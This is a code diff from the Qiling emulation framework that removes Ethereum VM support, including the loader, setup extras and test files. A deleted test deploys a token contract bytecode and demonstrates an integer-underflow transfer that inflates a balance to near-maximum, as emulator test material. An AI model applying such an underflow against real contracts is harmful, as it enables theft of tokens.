QL_ARCH.ARM64: "arm", QL_ARCH.A8086: "x86", - QL_ARCH.EVM: "evm.cs", QL_ARCH.CORTEX_M: "arm", QL_ARCH.MIPS: "mips", QL_ARCH.RISCV: "riscv", diff --git a/qiling/loader/evm.py b/qiling/loader/evm.py deleted file mode 100644 index a416c372d..000000000 --- a/qiling/loader/evm.py +++ /dev/null @@ -1,24 +0,0 @@ -#!/usr/bin/env python3 -# -# Cross Platform and Multi Architecture Advanced Binary Emulation Framework -# Built on top of Unicorn emulator (www.unicorn-engine.org) - - -from qiling.const import * -from qiling.core import Qiling -from .loader import QlLoader - - -class QlLoaderEVM(QlLoader): - def __init__(self, ql:Qiling): - super(QlLoaderEVM, self).__init__(ql) - self.ql = ql - - if self.ql.code is None: - with open(self.ql.path) as f: - self.code = f.read() - else: - self.code = ql.code - - def run(self): - pass diff --git a/qiling/utils.py b/qiling/utils.py index f4ca25a85..502761b5f 100644 --- a/qiling/utils.py +++ b/qiling/utils.py @@ -307,7 +307,6 @@ def select_loader(ostype: QL_OS, libcache: bool) -> QlClassInit['QlLoader']: QL_OS.WINDOWS : r'pe', QL_OS.UEFI : r'pe_uefi', QL_OS.DOS : r'dos', - QL_OS.EVM : r'evm', QL_OS.MCU : r'mcu', QL_OS.BLOB : r'blob' }[ostype] @@ -376,9 +375,7 @@ def __int_nothrow(v: str, /) -> Optional[int]: def select_arch(archtype: QL_ARCH, cputype: Optional[QL_CPU], endian: QL_ENDIAN, thumb: bool) -> QlClassInit['QlArch']: kwargs = {} - # skip cpu model for evm - if archtype is not QL_ARCH.EVM: - kwargs['cputype'] = cputype + kwargs['cputype'] = cputype # set endianess and thumb mode for arm-based archs if archtype is QL_ARCH.ARM: @@ -396,7 +393,6 @@ def select_arch(archtype: QL_ARCH, cputype: Optional[QL_CPU], endian: QL_ENDIAN, QL_ARCH.ARM : r'arm', QL_ARCH.ARM64 : r'arm64', QL_ARCH.MIPS : r'mips', - QL_ARCH.EVM : r'evm.evm', QL_ARCH.CORTEX_M : r'cortex_m', QL_ARCH.RISCV : r'riscv', QL_ARCH.RISCV64 : r'riscv64', diff --git a/setup.py b/setup.py index 82e654973..08650d1b3 100644 --- a/setup.py +++ b/setup.py @@ -25,23 +25,6 @@ ] extras = { - "evm": [ - "blake2b-py>=0.1.2", - "cached-property>=1.5.2;python_version<'3.8'", - "typing-extensions>=3.7.4.3;python_version<'3.8'", - "eth-keys>=0.2.1", - "eth-typing>=2.2.0", - "eth-utils>=1.9.4", - "eth_abi>=2.1.1", - "lru-dict>=1.1.6", - "py-ecc>=1.4.7", - "rlp>=2", - "trie==2.0.0-alpha.5", - "eth-hash[pycryptodome]", - "numpy", - "rich", - "cmd2" - ], "fuzz" : [ "unicornafl>=2.0.0;platform_system!='Windows'", "fuzzercorn>=0.0.1;platform_system=='Linux'" @@ -94,8 +77,7 @@ package_data={ 'qiling': ['profiles/*.ql'], 'qiling.debugger.gdb': ['xml/*/*'], - 'qiling.os.uefi': ['guids.csv'], - 'qiling.arch.evm.analysis': ['signatures.json'] + 'qiling.os.uefi': ['guids.csv'] }, install_requires=requirements, extras_require=extras, diff --git a/tests/test_evm.py b/tests/test_evm.py deleted file mode 100644 index b17a7510a..000000000 --- a/tests/test_evm.py +++ /dev/null @@ -1,161 +0,0 @@ -#!/usr/bin/env python3 - -import os -import platform -import unittest - -import sys -sys.path.append("..") - -from qiling import Qiling -from qiling.const import QL_ARCH, QL_VERBOSE - -SECRET_KEY = os.environ.get('AM_I_IN_A_DOCKER_CONTAINER', False) - -if SECRET_KEY: - sys.exit(0) - -if platform.system() == "Darwin" and platform.machine() == "arm64": - sys.exit(0) - -# python 3.10 has not been supported yet in the latest blake2b-py release -if sys.version_info >= (3, 10): - sys.exit(0) - - -class Checklist: - def __init__(self) -> None: - self.visited_hookcode = False - self.visited_hookinsn = False - self.visited_hookaddr = False - - -class EVMTest(unittest.TestCase): - def test_underflow_code(self): - ql = Qiling(code="0x6060604052341561000f57600080fd5b60405160208061031c833981016040528080519060200190919050508060018190556000803373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555050610299806100836000396000f300606060405260043610610057576000357c0100000000000000000000000000000000000000000000000000000000900463ffffffff16806318160ddd1461005c57806370a0823114610085578063a9059cbb146100d2575b600080fd5b341561006757600080fd5b61006f61012c565b6040518082815260200191505060405180910390f35b341561009057600080fd5b6100bc600480803573ffffffffffffffffffffffffffffffffffffffff16906020019091905050610132565b6040518082815260200191505060405180910390f35b34156100dd57600080fd5b610112600480803573ffffffffffffffffffffffffffffffffffffffff1690602001909190803590602001909190505061017a565b604051808215151515815260200191505060405180910390f35b60015481565b60008060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b600080826000803373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205403101515156101cb57600080fd5b816000803373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282540392505081905550816000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254019250508190555060019050929150505600a165627a7a7230582098f1551a391a3e65b3ce45cfa2b3fa5f91eea9a3e7181a81454e025ea0d7151c0029",archtype=QL_ARCH.EVM, verbose=QL_VERBOSE.DEBUG) - testcheck = Checklist() - argu = ql.arch.evm.abi.convert(['uint256'], [20]) - code = ql.code + argu - - user1 = ql.arch.evm.create_account(balance=100*10**18) - user2 = ql.arch.evm.create_account(balance=100*10**18) - c1 = ql.arch.evm.create_account() - - def hookcode_test(ql, *argv): - testcheck.visited_hookcode = True - - def hookinsn_test(ql, *argv): - testcheck.visited_hookinsn = True - - def hookaddr_test(ql, *argv): - testcheck.visited_hookaddr = True - - h0 = ql.hook_code(hookcode_test) - h1 = ql.hook_address(hookaddr_test, 10) - - # message1: deploy runtime code - msg0 = ql.arch.evm.create_message(user1, b'', code=code, contract_address=c1) - ql.run(code=msg0) - - ql.hook_del(h0) - ql.hook_del(h1) - h2 = ql.hook_insn(hookinsn_test, 'PUSH4') - - # # SMART CONTRACT DEPENDENT - message2: check balance of user1, should be 20 - def check_balance(sender, destination): - call_data = '0x70a08231'+ql.arch.evm.abi.convert(['address'], [sender]) - msg2 = ql.arch.evm.create_message(sender, destination, call_data) - return ql.run(code=msg2) - - result = check_balance(user1, c1) - print('\n\nuser1 balance =', int(result.output.hex()[2:], 16)) - ql.hook_del(h2) - - # SMART CONTRACT DEPENDENT - message3: transform 21 from user1 to user2 - call_data = '0xa9059cbb'+ ql.arch.evm.abi.convert(['address'], [user2]) + \ - ql.arch.evm.abi.convert(['uint256'], [21]) - msg1 = ql.arch.evm.create_message(user1, c1, call_data) - result = ql.run(code=msg1) - print('\n\nis success =', int(result.output.hex()[2:], 16)) - - # message4: check balance of user1, should be MAX - 1 - result = check_balance(user1, c1) - print('\n\nuser1 balance =', hex(int(result.output.hex()[2:], 16))) - - self.assertEqual(hex(int(result.output.hex()[2:], 16)), '0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff') - self.assertTrue(testcheck.visited_hookaddr) - self.assertTrue(testcheck.visited_hookcode) - self.assertTrue(testcheck.visited_hookinsn) - - def test_underflow_filename(self): - ql = Qiling(["../examples/rootfs/evm/Hexagon.hex"], archtype=QL_ARCH.EVM, verbose=QL_VERBOSE.DEBUG) - - user1 = ql.arch.evm.create_account(balance=100*10**18) - user2 = ql.arch.evm.create_account(balance=100*10**18) - c1 = ql.arch.evm.create_account() - - def check_balance(sender, destination): - call_data = '0x70a08231'+ql.arch.evm.abi.convert(['address'], [sender]) - msg2 = ql.arch.evm.create_message(sender, destination, data=call_data) - return ql.run(code=msg2) - - # Deploy runtime code - msg0 = ql.arch.evm.create_message(user1, b'', contract_address=c1) - ql.run(code=msg0) - - # # SMART CONTRACT DEPENDENT: check balance of user1 - result = check_balance(user1, c1) - print('User1 balance =', int(result.output.hex()[2:], 16)) - - # # SMART CONTRACT DEPENDENT: transform from user1 to user2 - call_data = '0xa9059cbb'+ ql.arch.evm.abi.convert(['address'], [user2]) + \ - ql.arch.evm.abi.convert(['uint256'], [0xfffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffe]) - msg1 = ql.arch.evm.create_message(user1, c1, data=call_data) - result = ql.run(code=msg1) - if int(result.output.hex()[2:], 16) == 1: - print('User1 transfered Token to User1') - - # # SMART CONTRACT DEPENDENT: User1 balance underflow, MAX - 1 - result = check_balance(user1, c1) - self.assertEqual(int(result.output.hex()[2:], 16), 420000000000000) - - result = check_balance(user2, c1) - self.assertEqual(int(result.output.hex()[2:], 16), 452312848583266388373324160190187140051835877600158453279131187530910662654) - - def test_abi_encoding(self): - ql = Qiling(code="0x608060405234801561001057600080fd5b506101a4806100206000396000f3fe608060405234801561001057600080fd5b506004361061002b5760003560e01c8063ead710c414610030575b600080fd5b6100e96004803603602081101561004657600080fd5b810190808035906020019064010000000081111561006357600080fd5b82018360208201111561007557600080fd5b8035906020019184600183028401116401000000008311171561009757600080fd5b91908080601f016020809104026020016040519081016040528093929190818152602001838380828437600081840152601f19601f820116905080830192505050505050509192919290505050610164565b6040518080602001828103825283818151815260200191508051906020019080838360005b8381101561012957808201518184015260208101905061010e565b50505050905090810190601f1680156101565780820380516001836020036101000a031916815260200191505b509250505060405180910390f35b606081905091905056fea2646970667358221220cf43353b75256fc42aaffd9632e06963c5c2aad72a91004bfd2f98cd56ae1a0c64736f6c63430006000033",archtype=QL_ARCH.EVM, verbose=QL_VERBOSE.DEBUG) - - user1 = ql.arch.evm.create_account(balance=100*10**18) - c1 = ql.arch.evm.create_account() - - # Deploy runtime code - msg0 = ql.arch.evm.create_message(user1, b'', contract_address=c1) - ql.run(code=msg0) - - # # SMART CONTRACT DEPENDENT: transform from user1 to user2 - call_param = ['Hello World'] - call_data = ql.arch.evm.abi.encode_function_call('greet(string)', call_param) - - function_abi = { - 'name': 'greet', - 'type': 'function', - 'inputs': [{ - 'type': 'string', - 'name': '' - }] - } - call_data2 = ql.arch.evm.abi.encode_function_call_abi(function_abi, call_param) - call_data3 = '0xead710c4'+ ql.arch.evm.abi.convert(['string'], call_param) - - self.assertEqual(call_data, call_data2) - self.assertEqual(call_data, call_data3) - - msg1 = ql.arch.evm.create_message(user1, c1, data=call_data) - result = ql.run(code=msg1) - - result_data = ql.arch.evm.abi.decode_params(['string'], result.output) - self.assertEqual(call_param[0], result_data[0]) - - -if __name__ == "__main__": - unittest.main() \ No newline at end of file diff --git a/tests/test_onlinux.sh b/tests/test_onlinux.sh index 52bd95e26..557b2e777 100755 --- a/tests/test_onlinux.sh +++ b/tests/test_onlinux.sh @@ -14,7 +14,6 @@ python3 ./test_edl.py && python3 ./test_qnx.py && python3 ./test_android.py && python3 ./test_mcu.py && -python3 ./test_evm.py && python3 ./test_blob.py && python3 ./test_qdb.py && python3 ./test_tendaac15_httpd.py && diff --git a/tests/test_r2.py b/tests/test_r2.py index 1d27891e8..ba29cc338 100644 --- a/tests/test_r2.py +++ b/tests/test_r2.py @@ -17,43 +17,8 @@ else: test_r2 = True -EVM_CODE = bytes.fromhex(""" - 6060604052341561000f57600080fd5b60405160208061031c83398101604052 - 8080519060200190919050508060018190556000803373ffffffffffffffffff - ffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffff - ff16815260200190815260200160002081905550506102998061008360003960 - 00f300606060405260043610610057576000357c010000000000000000000000 - 0000000000000000000000000000000000900463ffffffff16806318160ddd14 - 61005c57806370a0823114610085578063a9059cbb146100d2575b600080fd5b - 341561006757600080fd5b61006f61012c565b60405180828152602001915050 - 60405180910390f35b341561009057600080fd5b6100bc600480803573ffffff - ffffffffffffffffffffffffffffffffff16906020019091905050610132565b - 6040518082815260200191505060405180910390f35b34156100dd57600080fd - 5b610112600480803573ffffffffffffffffffffffffffffffffffffffff1690 - 602001909190803590602001909190505061017a565b60405180821515151581 - 5260200191505060405180910390f35b60015481565b60008060008373ffffff - ffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffff - ffffffffffffff168152602001908152602001600020549050919050565b6000 - 80826000803373ffffffffffffffffffffffffffffffffffffffff1673ffffff - ffffffffffffffffffffffffffffffffff168152602001908152602001600020 - 5403101515156101cb57600080fd5b816000803373ffffffffffffffffffffff - ffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16 - 8152602001908152602001600020600082825403925050819055508160008085 - 73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffff - ffffffffffffffffffffff168152602001908152602001600020600082825401 - 9250508190555060019050929150505600a165627a7a7230582098f1551a391a - 3e65b3ce45cfa2b3fa5f91eea9a3e7181a81454e025ea0d7151c0029 -""") - - @unittest.skipUnless(test_r2, 'libr is missing') class R2Test(unittest.TestCase): - def test_shellcode_disasm(self): - ql = Qiling(code=EVM_CODE, archtype=QL_ARCH.EVM, verbose=QL_VERBOSE.DISABLED) - r2 = R2(ql) - pd = r2._cmd("pd 32") - self.assertTrue('callvalue' in pd) - def test_addr_flag(self): ql = Qiling(["../examples/rootfs/x86_windows/bin/x86_hello.exe"], "../examples/rootfs/x86_windows", verbose=QL_VERBOSE.DISABLED) # x8864_hello does not have 'main'